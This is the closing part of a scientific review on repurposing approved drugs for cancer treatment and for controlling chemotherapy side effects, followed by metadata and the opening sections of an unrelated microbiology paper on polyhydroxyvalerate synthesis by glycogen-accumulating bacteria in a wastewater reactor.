The earliest introduction of thalidomide derivatives to cancer therapy was to control inflammation. Eventually, their ability to prevent the growth of certain cancer cells was recognized. Thalidomide and its more potent structural relatives, lenalidomide and pomalidomide, 23 are used to treat multiple myeloma, 24 mantle cell lymphoma, and myelodysplastic syndromes associated with the deletion 5q abnormality. On the other hand, apremilast (Otezla) was specifically designed to inhibit PDE4 25,26 and is now used to control psoriasis, lupus erythematosus and rheumatoid arthritis. 27 PDE4 is a phosphodiesterase that degrades cAMP, a small molecule that can modulate inflammatory responses. Targeted PDE4 inhibitors are in preclinical trials for cancer. 28,29 At this point, the mechanistic basis for using the thalidomide drug family in cancer becomes confusing, as these drugs have pleiomorphic effects. For example, their anti-inflammatory activity has been linked to their ability to inhibit secretion of tumor necrosis factor (TNF)-α and other cytokines. 30,31 Anti-TNF antibodies such as Humira have revolutionized the treatment of psoriasis and rheumatoid arthritis; however, inhibiting TNF may exacerbate inflammatory central nervous system syndromes such as multiple sclerosis. 32 A recent discovery suggests another basis for the action of thalidomide-related compounds in cancer cells: their ability to bind cereblon, 33 a protein involved in limb outgrowth. The devastating teratogenic effects of thalidomide when taken in early pregnancy have also been linked to this binding. Even more intriguing are current attempts to exploit thalidomide's binding to cereblon to induce specific protein degradation in cancer cells. 34 Early results indicated that thalidomide induced specific degradation of repressors in T-cells that can lead to activation and increased IL-2 secretion, providing another way to stimulate the immune system to fight cancer cells. 35
Cytokine-based therapies
There have been repeated trials of cytokines as co-therapies. The earliest cytokines to enter cancer trials were the recombinant interferons (IFN), introduced in the 1980s. 36-39 The IFNs were identified for their antiviral activity; their first use in cancer was for the control of leukemias. They have also been tested in a variety of blood and solid cancers. IFN-α was used for many years to treat hairy cell leukemia, 40 CML and myelofibrosis 41 ; it may still be resorted to, alone or as adjunct therapy, for CML patients resistant to multiple TKIs. 1 A recent paper reported deep molecular remission in four of nine CML patients treated with imatinib plus ropeginterferon-α2b, with few AEs. 42 IFNs have also been suggested to enhance treatment with temozolomide by inhibiting the MGMT repair enzyme. 43 However, chromosome instability in AML has been shown to directly upregulate IFN-stimulated genes, 44 suggesting that IFN itself will not be helpful in treatment. The cost, need for injection or infusion, and side effects of IFNs suggest they could be replaced with small-molecule intracellular inducers, such as STING activators, 45,46 which may also require injection, or with compounds that activate select steps in the IFN-induced pathways.
Other cytokines 39,47 have been tried repeatedly as co-treatments. Two of these proteins, TNF 48 and IL-2, were highly anticipated as potential anticancer therapies. Early tests showed some successes, but their toxic effects thwarted widespread clinical use. As with IFNs, there are continuing attempts to repurpose IL-2 in cancer therapy, [49][50][51][52] as an additive to immunotherapy, or for treating patients who have failed to respond to immunotherapy. 53 More study on how to control the AEs in IL-2 treatments 54,55 may lead to safer ways to use this molecule in cancer.
TNF is also problematic as a cancer treatment. Direct clinical use of TNF has been limited by side effects such as cachexia and fever. TNF has been implicated in the origin of many different types of tumors, possibly precluding its use as a treatment. 56 Furthermore, TNF levels in the body rise with age, 57,58 along with the increased incidence of cancer. TNF levels should certainly be checked in patients who fail to respond to immune therapies.
However, things may turn around for this protein; a recent paper using mouse models suggests that the TLR5 agonist entolimod may control the toxic effects of TNF without affecting its antitumor activity. 59 If this proves true in human trials, it may open a new avenue for TNF in cancer therapy.
Other drugs in testing
Other agents designed to treat a variety of diseases are being tested against cancers. Statins have been tested as anticancer agents, as they can inhibit the activity of many GTPase oncogenes. While statins have not performed well as cancer drugs, 60 disulfiram (Antabuse), developed to treat alcoholism, is being tested with copper for metastatic breast cancer (NCT03323346). Nelfinavir, an HIV protease inhibitor that also inhibits AKT signaling, is in phase I trials for treating solid tumors 61 (NCT01445106).
Gamma-secretase inhibitors, developed to treat Alzheimer disease (AD), are in multiple trials as anticancer drugs (alone [NCT01981551, NCT03785964, NCT03691207] or in combination with CAR-T therapy [NCT03502577]), as they also inhibit Notch 1 and signal peptidases. 62 In turn, the cancer drug saracatinib (AZD-0530), designed to inhibit the SRC and BCR-ABL kinases, is now being tested for its effects on AD, 63 based on its inhibition of the Fyn kinase, which may contribute to synaptotoxicity.
Repurposing drugs to control the effects of or enhance chemotherapy
Oncologists are also combining chemotherapeutics with compounds to control their effects on normal cells or improve their overall activity. Many FDA-approved chemotherapy drugs have severe side effects, ranging from blistering at the site of infusion to hair and teeth loss. While cooling the scalp or chewing ice during the infusion can partially control these side effects, 64 additional anti-inflammatory compounds are being sought. The orally available inhibitors of poly (ADP-ribose) polymerase (PARP) and kinases are easy to administer, but they may induce side effects such as nausea, 65,66 which may require co-treatment with antiemetics. However, proton pump inhibitors, used to control GERD symptoms in as many as 30% of cancer patients, have been shown to limit the effect of chemotherapy and worsen OS. 67

Patients with cardiac problems especially may benefit from co-treatment during chemotherapy with drugs such as β-blockers and aspirin. 68,69 Low-dose aspirin has long been recommended both to control inflammation and to inhibit coagulation, and was previously recommended to reduce the incidence of stroke and heart attack. However, ASPREE, a 4.7-year placebo-controlled trial of >19,000 individuals aged 65-70 years and older, found no advantage of taking aspirin; the risk of being diagnosed with stage 3 or 4 cancers, and the associated mortality, were higher in the aspirin-treated patients than in the placebo group. 70

The usefulness of β-blockers in controlling tumor growth has been explored in particular because propranolol decreased the proliferation, migration and invasion of triple-negative breast cancer cells in vitro. 71 Topical treatment with the β-blockers propranolol and timolol is a validated treatment for complicated infantile hemangiomas. 72,73 Many studies also indicate that β-blockers can control the growth of vascular sarcomas and other endothelial cell tumors. 74 Their use in other cancers has shown less benefit: multiple retrospective studies of patients treated with combination therapies including β-blockers have shown little indication of overall efficacy in ovarian cancer, 75 lung cancer 76 or in preventing cancer recurrence. 77 However, β-blocker co-treatment with anthracyclines can significantly reduce chemotherapy cardiotoxicity and preserve left ventricular function. 78,79 Furthermore, topical treatments with propranolol and timolol, such as those developed for infantile hemangiomas, can also shorten the recovery time when applied to the painful swelling around the nails that can develop after treatment with EGFR inhibitors. 80

Another repurposed drug, dexrazoxane, may be superior for this use. Originally developed as an antimitotic, dexrazoxane, the (+)-enantiomer of razoxane, has now been approved by the FDA as a cotreatment to prevent anthracycline-induced extravasation injuries 81 and cardiomyopathy. Dexrazoxane's effect may be due to its ability to inhibit the formation of a toxic iron-anthracycline complex. 82 A recent multicenter study 83 of over 1000 AML patients treated with daunorubicin or mitoxantrone showed that cotreatment with dexrazoxane significantly lowered cardiac problems and also reduced treatment-related mortality. Dexrazoxane cotreatment is also used for immunosuppressive purposes.
The blood pressure medication mibefradil, which slows the excretion of many common drugs, can be used short term to enhance the activity of several cancer drugs. 84 However, this may be counterproductive, as increases in a drug's plasma concentration can induce cytokine-release syndrome (also called 'cytokine storm'). Drugs that can prevent the release of several inflammatory cytokines are hence useful. Abivertinib 85 is a novel small-molecule TKI targeting mutant forms of both EGFR and Bruton's tyrosine kinase (BTK). In addition to slowing cell growth, abivertinib binds BTK irreversibly and prevents its phosphorylation, thereby inhibiting the release of pro-inflammatory cytokines, including IL-1β, IL-6 and TNF-α.
Leucovorin (folinic acid), developed to treat pernicious and megaloblastic anemias, 86 can control the side effects of methotrexate and other chemotherapy drugs. Combinations of leucovorin with 5-fluorouracil and either oxaliplatin or irinotecan (the FOLFOX or FOLFIRI regimens) are standard treatments for colorectal cancers. However, alternatives to oxaliplatin should be sought, as severe and long-term neurotoxic AEs are associated with this combination. 87 Artemisinin (a malaria treatment) derivatives may be an alternative to oxaliplatin, as they are cytotoxic against colon cancer cell lines at low concentrations when used in combination with leucovorin and 5-fluorouracil (the FOLNSC combination). 88 Another problem arising in cancer is enhanced coagulation, leading to stroke and heart attacks, due to chemotherapy or disease progression. While aspirin can reduce coagulation, other compounds specifically designed to control clotting, such as apixaban (Eliquis), a factor Xa inhibitor developed to treat atrial fibrillation, 89 may be preferable as cancer progresses. Apixaban does not have the same effect on platelet interaction as warfarin and heparin and may thus be a safer alternative.
One problem with combining inhibitors is that treatment with a wide variety of cytotoxic agents enhances mutations and treatment resistance by inducing ER stress and the unfolded protein response (UPR). UPR-induced autophagy supports tumorigenesis and the development of resistance to treatment. 90,91 One way to handle the unfolded protein response to chemotherapy in general is to control the proteasome, which regulates protein expression by removing ubiquitylated proteins. Proteasome inhibitors such as ixazomib (Ninlaro®) can be combined with lenalidomide and dexamethasone for the treatment of patients with multiple myeloma who have received at least one prior therapy. Bortezomib (Velcade) is used in multiple myeloma and mantle cell lymphoma. Bortezomib causes a rapid and dramatic change in the levels of intracellular peptides produced by the proteasome, 92 due to the inhibitor's direct interaction with proteasome subunits. Bortezomib has been suggested as an alternative to vincristine (and to treat neuropathy associated with vincristine treatment) in pediatric ALL. 93 Of course, no drug is without AEs; a recent report 94 suggests that administration of the antihistamine ketotifen can control the ocular effects of bortezomib.
Repurposing cancer therapies as antivirals and specifically anti-Covid-19 treatments
There is a clear overlap between the needs of cancer and severe Covid-19 patients for drugs that control inflammation and coagulation. Thus, there has been a recent spate of papers on repurposing drugs, including chemotherapy agents, to treat Covid-19 (and, before the current pandemic, Ebola virus). The reader will not be surprised that trials of metformin and thalidomide as possible adjuvant treatments are planned (e.g. NCT04510194, NCT04273529). A recent review summarizes the plethora of ongoing clinical trials of anticancer drugs being tested. 95 Among these are many phase 1-3 trials of IFNs and Janus-associated kinase (JAK) inhibitors, alone or in combination with antiviral drugs. The JAK inhibitor baricitinib has also been reported to be efficacious in treating Covid-19. There are also intriguing reports that those with mutations in IFN-related genes 97 or auto-antibodies against IFNs have a more severe disease course. 98 Covid-19, along with other β-coronaviruses, is known to interfere with the early immune response that is based on IFN and the genes it stimulates.
However, while early treatment with IFN (types I and III) may have benefit, later in the disease course, it can cause damage to the lung epithelia that can lead to superinfections. 99 This is because IFNs can also play a role in cytokine release syndrome or 'cytokine storm', which may be responsible for mortality associated with Covid-19. Other tests are ongoing to determine whether inhibition of specific inflammatory cytokines is beneficial. A recent report found high levels of TNF in T-cells from Covid-19 patients with a fatal outcome and suggested the cytokine may have inhibited the immune response to the virus. 100 As this increase may inhibit normal humoral responses, 100 it is possible that TNF inhibitors, such as those developed for psoriasis, might be beneficial in treatment.
There are also many ongoing clinical trials for tocilizumab and other inhibitors of interleukin-6, a cytokine associated with inflammation. These IL-6 inhibitors were previously approved to treat multiple myeloma, lymphoproliferative disorders and Castleman's syndrome. Abivertinib, a cancer therapy TKI, is in phase 2 clinical trials for repurposing to prevent cytokine storm in Covid-19 patients (NCT04440007).
While these trials are dedicated to finding better treatments for Covid-19 in this hour of emergency, it is clear that the results can have impact on the future course of cancer therapy. There are particular ramifications for how to control the inflammatory AEs of immune therapy, which often limit its usefulness in treating fragile patients who have endured many types of chemotherapy. Companies should be conscious of the advantages of combining repurposed compounds with novel therapies, during their clinical trials. Any additional costs will be more than paid for if the therapy is then more acceptable to patients.
A few words in parting
While the examples here show the positive side of repurposing, it should be noted that not all chemotherapy agents can be reused for every cancer, and combining therapies does not always bring better results. For example, recent results of a breast cancer trial 101 indicate that adding the anthracycline epirubicin (plus 5-fluorouracil and cyclophosphamide) to neoadjuvant chemotherapy (including trastuzumab and pertuzumab) had little effect on event-free survival but increased AEs, including two women who developed acute leukemia. As chemotherapy may act in breast cancer primarily by inducing terminal menopause, adding it to treatments designed to reduce estrogen levels may be superfluous. A 1999 study of metastatic (stage IV) melanoma showed there was no survival advantage to combining dacarbazine with cisplatin, carmustine and tamoxifen compared to high-dose dacarbazine alone; only 25% of the patients on either regimen survived more than a year. 102 Fortunately, new immunotherapy drugs, such as the combination of CTLA-4 and PD-1 inhibitors (ipilimumab and nivolumab), have revolutionized the outlook for patients with metastatic melanoma. A recent report showed 1-year survival exceeding 80%, with 4-year rates >50%. 103 A second caution is that while many FDA-approved compounds have been found to have antitumor cell activity in vitro in 'high-throughput' screening, moving them into human treatments is difficult. Not every new combination of drugs can be tested in a randomized controlled trial; the costs, not to mention the lack of suitable patients, would be prohibitive. Improving selection from 'shot in the dark' assays of whole cells requires a better understanding of why a given drug is cytostatic, and skepticism is called for when effects in culture require unrealistically high concentrations. For example, emetine, better known as an active ingredient of ipecac syrup used to induce vomiting, binds ribosomes 104 and has been reported to selectively kill AML cells. 105 Whether its side effects can be overcome sufficiently to justify testing as a cancer therapeutic is not currently clear.
Investigating the metabolic basis for a 'hit' can be time consuming and costly. Funding is often lacking for such trials, 106 especially for off-patent drugs.
In this respect, more public and pharmaceutical coalition funding should be available for off-label testing. Another major difficulty in repurposing compounds is the need to assemble a proper patient pool for a blinded, controlled study. One must take into account that cancer patients, especially those who are older, have additional diseases, or have survived many different treatments and the accompanying AEs, are fragile. For example, a paper reporting a complete response to ipilimumab therapy following treatment with BRAF/MEK inhibitors ended by reporting the patient's death from side effects of the therapy. 107 Many trials, even of new drugs, are abandoned because they do not reach their target patient pool within a reasonable time frame, or because the funding company changes direction. Dosages that are well tolerated in trials with healthy subjects, or when used for the diseases a drug was originally intended to treat, may not be achievable in cancer patients. Combination therapies only compound these problems. However, individual treatments with older drugs can lead to remarkable cures. 108 Still, the best approach for a patient who has no clear alternative therapy may be to recommend an ongoing trial. Another alternative, for patients with genetic markers that correlate with the anticipated activity of a test intervention, is the N-of-1 trial. 109 Here, the patient serves as his or her own control. The success of the therapy, or the basis for continuing it, can be judged, for example, on blood levels of selected metabolites and proteins expected to track reduced disease or tumor growth.
Conclusions
The examples included in this review and related references show that the pantheon of approved drugs is a rich source of solutions for many problems in oncology. Replacing cytotoxic with cytostatic drugs targeting specific cellular pathways promises to further enhance treatment while limiting AEs. Combinations with repurposed inhibitors designed to control inflammation can control the toxicity of chemotherapeutics or cytokines to normal cells and provide new treatments for resistant tumors.
The pace of research on repurposing compounds from all clinical areas is breathtaking and has contributed to increasing survival and easing the effects of chemotherapy on cancer patients. In the proper setting, established drugs can be smart therapies that can replace untargeted toxins relied upon in the past.
Data Availability Statement
No new data were generated or analyzed in support of this research.
Funding
This work was supported in part by grants from the National Institute of Allergy and Infectious Diseases, USA, R21 AI105985-01 (to CHS) and R01 AI137332-01.
"year": 2021,
"sha1": "fd87595c463f3188e8ffac06cd98429356e581f7",
"oa_license": null,
"oa_url": "https://academic.oup.com/bmb/article-pdf/137/1/13/36684677/ldaa045.pdf",
"oa_status": "BRONZE",
"pdf_src": "PubMedCentral",
"pdf_hash": "e2b97c0bc5b96aad1d33e6b652b79be4d7b0747d",
"s2fieldsofstudy": [
"Medicine"
],
"extfieldsofstudy": [
"Medicine"
]
} |
Ethylmalonyl-CoA pathway involved in polyhydroxyvalerate synthesis in Candidatus Contendobacter
Here, a stable glycogen-accumulating organisms (GAOs) enrichment system was operated in anaerobic–aerobic mode in a sequencing batch reactor, and we focused on the metabolic mechanisms of PHA storage by GAOs. Our system showed the classic characteristics of glycogen-accumulating metabolism (GAM): glycogen consumption accompanied acetic acid uptake to synthesize poly-β-hydroxyalkanoates (PHAs) during the anaerobic period, and glycogen was resynthesized through PHA degradation in the aerobic stage. The microbial community structure indicated that Candidatus Contendobacter was the most prevalent GAO. We found that the ethylmalonyl-CoA (EMC) pathway was the crucial pathway supplying the core intermediate propionyl-CoA for poly-β-hydroxyvalerate (PHV) synthesis in Candidatus Contendobacter. Gene source analysis showed that all genes of the EMC pathway were mainly located in Candidatus Contendobacter. The expression of the key EMC pathway genes increased with the enrichment of Candidatus Contendobacter, further validating that propionyl-CoA was synthesized by Candidatus Contendobacter predominantly via the EMC pathway. Our work reveals a novel mechanism underlying PHV synthesis through the EMC pathway and refines the current picture of intracellular storage metabolism in GAOs.
Introduction
Enhanced Biological Phosphorus Removal (EBPR) is a widely used process for achieving phosphorus removal from wastewater, in which phosphorus-accumulating organisms (PAOs) take up and store phosphate. Disturbances in operating conditions, such as the carbon-phosphorus ratio, substrate type, temperature and redox potential, can lead to inefficiencies and even the deterioration of the EBPR system (Nittami et al. 2017; Tayà et al. 2013; Welles et al. 2016a; Zhang et al. 2008). These problems have often been attributed to glycogen accumulating organisms (GAOs), although this is yet to be convincingly shown in full-scale systems, where the presence of GAOs does not always coincide with poor performance (Lopez-Vazquez et al. 2009; Weissbrodt et al. 2013; Winkler et al. 2011). GAOs thus raise growing concern about adverse impacts on EBPR systems. Similar to PAOs, GAOs consume their intracellular glycogen as the energy source for VFA absorption and PHA synthesis; in the following aerobic phase, GAOs consume PHAs to synthesize glycogen for growth (Zhang et al. 2008). However, some studies have reported that GAOs exist in full-scale EBPR plants without affecting the phosphorus removal efficiency (Lanham et al. 2013; Nielsen et al. 2019). Therefore, the biological characteristics of GAOs require further exploration.
The intracellular storage compounds play a key role in regulating microbial metabolism. PHAs, including poly-β-hydroxybutyrate (PHB), poly-β-hydroxyvalerate (PHV) and poly-β-hydroxy-2-methylvalerate (PH2MV), are important intracellular carbon and energy sources for GAOs as well as PAOs. In comparison with PAOs, GAOs are more active in terms of PHA utilization and produce more diverse PHAs (PHB and PHV) from the same organic substrate (Bengtsson 2009; Zhang et al. 2019). In GAOs, PHA synthesis proceeds via the following pathway: acetic acid is taken up to form acetyl-CoA, and propionyl-CoA is produced from pyruvate (an intermediate in glycolysis) through the succinate-propionate pathway. Finally, one molecule each of acetyl-CoA and propionyl-CoA are polymerized to PHV by a polymerase, while two molecules of propionyl-CoA form 3-hydroxy-2-methylvalerate, which is then polymerized to PH2MV. Many studies have validated that GAOs produce propionyl-CoA mainly through the succinate-propionate pathway, after which it combines with acetyl-CoA to form PHV. However, depending on the bacterial species, propionyl-CoA can be produced via different routes, not just the succinate-propionate pathway (Guedes da Silva et al. 2020; McIlroy et al. 2014; Schneider et al. 2012). Hence, the metabolism of the intracellular storage compounds in GAOs remains unclear.
There may be significant differences in glycogen degradation, intracellular storage and VFA metabolism among different kinds of GAOs (McIlroy et al. 2014; Oehmen et al. 2006). For example, there are considerable differences between Candidatus Competibacter denitrificans and Candidatus Contendobacter odensis in the Embden-Meyerhof-Parnas and Entner-Doudoroff glycolytic pathways: Candidatus Contendobacter cannot carry out glycolysis through the Entner-Doudoroff pathway or perform denitrification (McIlroy et al. 2014). Many studies have reported that denitrifying GAOs become one of the crucial functional microorganisms in full-scale EBPR plants with stable performance (Ji et al. 2017; Yuan et al. 2020). GAOs have also been used for the simultaneous removal of pollutants such as nitrogen and phosphorus under anaerobic-aerobic conditions (He et al. 2020). In addition, some studies have investigated the feasibility of simultaneous partial nitrification, denitrification and phosphorus removal in a single-stage anaerobic/microaerobic sequencing batch reactor (Yuan et al. 2020), suggesting that denitrifying GAOs and denitrifying PAOs played major roles in nitrogen and phosphorus removal, respectively. The intracellular storage compounds therefore play a vital role in GAO metabolism, and such novel applications require further elucidation of the mechanisms of intracellular storage and of the distinct functions of different GAOs.
In this study, we developed a stable GAO-enrichment anaerobic-aerobic sequencing batch reactor (SBR) system in which acetic acid was used as the sole carbon source and the supernatant was decanted after the anaerobic period. Metagenomics and metatranscriptomics were used to study the dynamic changes of the microbial community. We focused on identifying the pathways and key genes associated with the metabolism of intracellular storage compounds. Further, we traced the sources of the key genes to assess the core pathway of intracellular storage metabolism in GAOs. Our results should improve our ability to optimize, manipulate and extend the bioprocess of GAO enrichment systems.
Materials and methods
Reactor design and operation process

The SBR system was operated under anaerobic-aerobic conditions. The inoculated sludge came from the secondary sedimentation unit of a sewage treatment plant in Tianjin, China. The volume exchange rate was approximately 70% after the anaerobic stage, and the cycle time was 6 h. Each cycle consisted of six stages: a filling period (2 min), an anaerobic phase (90 min), a settling phase (15 min), a withdrawing period (6 min), an aerobic phase (240 min) and an idle period (9 min); the operation of a single cycle is shown in Fig. 1. The SBR system was controlled using a programmable logic controller, and influent feeding was controlled by a liquid level meter and a submersible pump. Anaerobic mixing was achieved using an electric agitator, and aeration was controlled with a rotameter.
Culture media
In the system, we used synthetic wastewater, which included 400-440 mg HAc/L as the source of carbon, 40 mg/L NH4+-N (provided by NH4Cl) as the source of nitrogen, and 5 mg/L PO43−-P (provided by KH2PO4) as the source of phosphorus. Other nutrient salts included 50 mg/L MgSO4·7H2O, 20 mg/L KCl, 20 mg/L CaCl2, 0.1 mg/L FeSO4·7H2O, 0.1 mg/L CuSO4·5H2O and 0.1 mg/L MnSO4. According to the properties of the actual wastewater, pH was not controlled in this study.
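For context, this recipe implies a strongly carbon-rich feed. A small sketch of the arithmetic is given below; the 64/60 gCOD-per-gHAc factor follows from complete oxidation of acetic acid (CH3COOH + 2 O2 → 2 CO2 + 2 H2O), and the resulting COD:N:P ratio of roughly 100:9:1 is our derived figure, not a value reported by the authors.

```python
# Theoretical oxygen demand of acetic acid: one mole of HAc (60 g)
# consumes two moles of O2 (64 g) on complete oxidation.
COD_PER_G_HAC = 64.0 / 60.0              # ~1.067 g COD per g HAc

hac_mg_per_l = (400 + 440) / 2           # mid-range influent acetate
cod = hac_mg_per_l * COD_PER_G_HAC       # mg COD/L, ~448
n, p = 40.0, 5.0                         # mg NH4+-N/L, mg PO43--P/L

print(f"COD ≈ {cod:.0f} mg/L")
print(f"COD:N:P ≈ 100:{100 * n / cod:.1f}:{100 * p / cod:.1f}")
```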
Analytical methods of reactor performance
Acetic acid levels were measured by high-performance liquid chromatography using an ODS-2 Hypersil™ column (Thermo Fisher Scientific, Waltham, MA, USA) and an ultraviolet detector (Qing 2017). PHA (PHB and PHV) levels were measured by gas chromatography (GC) (Oehmen et al. 2005). Weighed freeze-dried biomass and PHB/PHV standards were placed into glass tubes, mixed with 2 mL methanol acidified with 3% H2SO4 and 2 mL chloroform, and heated at 105 °C for 6 h. Benzoic acid was used as the internal standard. After cooling, 1 mL Milli-Q water was added to the samples, followed by thorough mixing and incubation at −20 °C overnight to achieve phase separation. After centrifugation for 5 min at 6000 rpm, PHA levels in the chloroform phase (bottom layer) were measured. Glycogen levels were determined according to a previously described method (Wang et al. 2006): intracellular glycogen was extracted using NaOH and C2H5OH at 70 °C after removal of extracellular polymers, and the anthrone method was then used for glucose concentration measurement. Phosphate levels were measured using ammonium molybdate spectrophotometry. Mixed liquor suspended solids were determined gravimetrically.
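A generic internal-standard calculation of the kind underlying the GC quantification above is sketched below. The peak areas, internal-standard mass and relative response factor (RRF) are hypothetical placeholders; the authors' actual calibration values are not reported here.

```python
def analyte_mass(area_analyte: float, area_is: float,
                 mass_is: float, rrf: float) -> float:
    """Analyte mass from peak areas, given the mass of internal
    standard (IS) added and a relative response factor determined
    from standards: RRF = (A_std / A_IS) / (m_std / m_IS)."""
    return (area_analyte / area_is) * mass_is / rrf

# Hypothetical run: PHB peak quantified against a benzoic acid IS.
m_phb = analyte_mass(area_analyte=5.2e5, area_is=4.0e5,
                     mass_is=1.0,   # mg of IS added to the tube
                     rrf=1.3)       # from a PHB standard curve
print(f"PHB in sample ≈ {m_phb:.2f} mg")
```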
Metagenomic sequencing
Samples were collected at the end of the anaerobic period on days 1, 20, 39, 52 and 75 after sludge inoculation, for three consecutive cycles at each time point. A 5 mL mixed-liquor sample was collected during each cycle. DNA was extracted and purified, and a total of 1 μg DNA per sample was used to generate sequencing libraries with an insert size of about 350 bp. Library construction and sequencing were completed on the Illumina HiSeq platform (Novogene Bioinformatics Technology Co., Ltd., Beijing, China). The raw data were processed using Readfq (V8, https://github.com/cjfields/readfq) to obtain clean data for subsequent analysis. Gene abundance evaluation and species annotation were then performed. The method details are described in previous studies (Ai et al. 2019; McIlroy et al. 2014).
Metatranscriptome sequencing
Sampling was performed as described above. Total RNA was extracted using TRIzol (Invitrogen, Waltham, MA, USA), and quality was checked using 1% agarose gel electrophoresis and a Qubit 2.0 fluorometer (Invitrogen). RNA integrity and quantity were measured using the RNA Nano 6000 Assay Kit on the Bioanalyzer 2100 system. The RNA library for metatranscriptome sequencing was prepared using an rRNA-depletion, strand-specific protocol. RNA was fragmented into 250-300 bp fragments and reverse transcribed into cDNA. Remaining overhangs of the double-stranded cDNA were converted into blunt ends via exonuclease/polymerase activities. After adenylation of the 3' ends of the DNA fragments, sequencing adaptors were ligated to the cDNA. To preferentially select cDNA fragments of 250-300 bp in length, the library fragments were purified with the AMPure XP system, and the cDNA was then amplified by PCR. Raw data generation, data filtering and taxonomic annotation were performed as for the metagenomic sequencing. The metatranscriptome sequencing data have been submitted to the NCBI Sequence Read Archive database under accession number PRJNA791813.
Data analysis for the microbial community and functional genes source
To annotate the microbial community in the system, bacterial sequences were searched against the NR database of NCBI (version 2018-01-02, https://www.ncbi.nlm.nih.gov/) using DIAMOND (Buchfink et al. 2015) blastp with a cut-off e-value of 1e−5. Because each sequence may align to multiple hits, all hits with an e-value ≤ 10× the smallest e-value were retained, and the LCA (lowest common ancestor) algorithm was applied to them to assign the taxonomic annotation of each sequence (Hanson et al. 2016).
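A minimal sketch of this filter-then-LCA step is shown below, assuming each hit carries its taxonomic lineage as an ordered list from root to leaf (hypothetical data structures; the actual pipeline applies this at scale to DIAMOND output):

```python
def lca_annotation(hits):
    """hits: list of (evalue, lineage) pairs, where lineage is an
    ordered list such as ['Bacteria', ..., 'Ca. Contendobacter'].
    Keep hits with evalue <= 10 * best evalue, then return the
    lowest common ancestor of the retained lineages."""
    best = min(e for e, _ in hits)
    kept = [lin for e, lin in hits if e <= 10 * best]
    lca = []
    for ranks in zip(*kept):             # walk ranks root -> leaf
        if all(r == ranks[0] for r in ranks):
            lca.append(ranks[0])
        else:
            break                        # lineages diverge here
    return lca

hits = [
    (1e-30, ["Bacteria", "Proteobacteria", "Gammaproteobacteria",
             "Ca. Contendobacter"]),
    (5e-30, ["Bacteria", "Proteobacteria", "Gammaproteobacteria",
             "Ca. Competibacter"]),
    (1e-5,  ["Bacteria", "Nitrospirae", "Nitrospira", "Nitrospira"]),
]
# The third hit fails the 10x-best-evalue filter; the first two agree
# down to class level, so the sequence is annotated at that rank.
print(lca_annotation(hits))
# ['Bacteria', 'Proteobacteria', 'Gammaproteobacteria']
```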
To analyze the sources of functional genes, DIAMOND with the same cut-off was used to align Unigenes to the KEGG database (version 2018-01-01, http://www.kegg.jp/kegg/). For each sequence, the best BLAST hit was used for subsequent analysis. If a functional gene annotation and a taxonomic annotation were located on the same Unigene, the functional gene was considered to be contributed by that taxon. The relative abundances at different functional hierarchy levels and the gene number tables of each sample at each taxonomic level were then obtained. Finally, the annotated functional genes were ranked by host abundance, and the top five hosts were selected for the next step of the analysis.
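A sketch of the host-ranking step follows, assuming per-Unigene records with a gene label, a taxon and an abundance value (the field names are hypothetical; the published pipeline works from annotation tables rather than this structure):

```python
from collections import defaultdict

def top_hosts(unigenes, gene, n=5):
    """Sum abundance per taxon over all Unigenes annotated with the
    given functional gene, then return the n most abundant hosts."""
    by_taxon = defaultdict(float)
    for u in unigenes:
        if u["gene"] == gene:
            by_taxon[u["taxon"]] += u["abundance"]
    return sorted(by_taxon.items(), key=lambda kv: -kv[1])[:n]

unigenes = [  # hypothetical annotated Unigenes
    {"gene": "ccr", "taxon": "Ca. Contendobacter", "abundance": 39.5},
    {"gene": "ccr", "taxon": "Ca. Competibacter",  "abundance": 12.8},
    {"gene": "ccr", "taxon": "Thauera",            "abundance": 4.1},
    {"gene": "mcl", "taxon": "Ca. Contendobacter", "abundance": 8.7},
]
print(top_hosts(unigenes, "ccr"))
```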
Establishment of GAOs reactor and performance indexes
The seeding sludge was collected from a secondary sedimentation tank of a Tianjin wastewater treatment plant. During sludge acclimation, several indexes, including acetate, glycogen, PHAs (PHB and PHV) and phosphate, were monitored. Over long-term operation, the glycogen and PHA (PHB and PHV) levels measured at A60 (60 min into the anaerobic phase) increased with time, while the acetate level decreased; the level of glycogen synthesis also increased. Furthermore, the phosphorus level remained almost unchanged. These results suggested that the rate of acetate removal and the levels of glycogen and PHA synthesis gradually increased in the system during the anaerobic period. The system showed the characteristics of GAOs after 39 d (Fig. 2a).

Fig. 2 The performance of the GAOs enrichment culture system. a Changes in glycogen, acetate, PHAs and phosphorus during the 75 days of operation. b Changes in glycogen, acetate, PHAs and phosphorus in a typical cycle of the steady phase.

The above indexes were also measured over a typical anaerobic-aerobic cycle of the steady stage, during which the system showed the typical phenotype of a GAO-enriched culture. Acetate was completely consumed within 60 min of the anaerobic stage, accompanied by a decrease in intracellular glycogen of 0.064 g/gSS. PHB and PHV levels increased by 0.059 g/gSS and 0.012 g/gSS, respectively, while the phosphate level remained almost unchanged, indicating that the organic substrate was completely consumed and transformed into the intracellular storage polymers PHAs (PHB and PHV). The phosphate level remained at 5 mg/L from the beginning to the end of the anaerobic phase, with almost no phosphate release, implying that the energy required for the anaerobic uptake of acetic acid was derived from glycogen degradation rather than from polyphosphate hydrolysis. In the subsequent aerobic phase, glycogen was accumulated, and the intracellular polymers PHAs (PHB and PHV) were used for growth and to replenish glycogen stores (Fig. 2b). These results demonstrated that typical GAM characteristics were successfully established.
In this study, we further compared the ratios of PHB/PHV production, glycogen consumption, phosphorus release and acetic acid uptake to those of the GAO/PAO models reported in previous studies. The stoichiometric ratios were close to those of GAO or PAO models exhibiting glycogen-accumulating metabolism (GAM). The Gly/VFA and PHA/VFA ratios were slightly higher than those reported for other GAO models, while the PHV/VFA and PHV/PHB ratios were lower; for example, the PHV/PHB ratio was 0.22 (Table 1), suggesting that we successfully established the GAO enrichment model.
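As a consistency check, converting the measured mass increments from the typical cycle (0.059 g PHB/gSS and 0.012 g PHV/gSS) to a carbon-mole basis, as is conventional in GAO/PAO stoichiometric models, reproduces the reported PHV/PHB ratio of 0.22. The sketch assumes monomer formulas C4H6O2 (86 g/mol) for PHB units and C5H8O2 (100 g/mol) for PHV units:

```python
# Monomer unit masses and carbon counts within the polymer chain.
PHB_MW, PHB_C = 86.0, 4    # C4H6O2 hydroxybutyrate unit
PHV_MW, PHV_C = 100.0, 5   # C5H8O2 hydroxyvalerate unit

phb_cmol = 0.059 / PHB_MW * PHB_C   # g/gSS -> Cmol/gSS
phv_cmol = 0.012 / PHV_MW * PHV_C

print(f"PHV/PHB (Cmol basis) = {phv_cmol / phb_cmol:.2f}")  # 0.22
```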
Microbial community dynamics in the GAO enrichment system
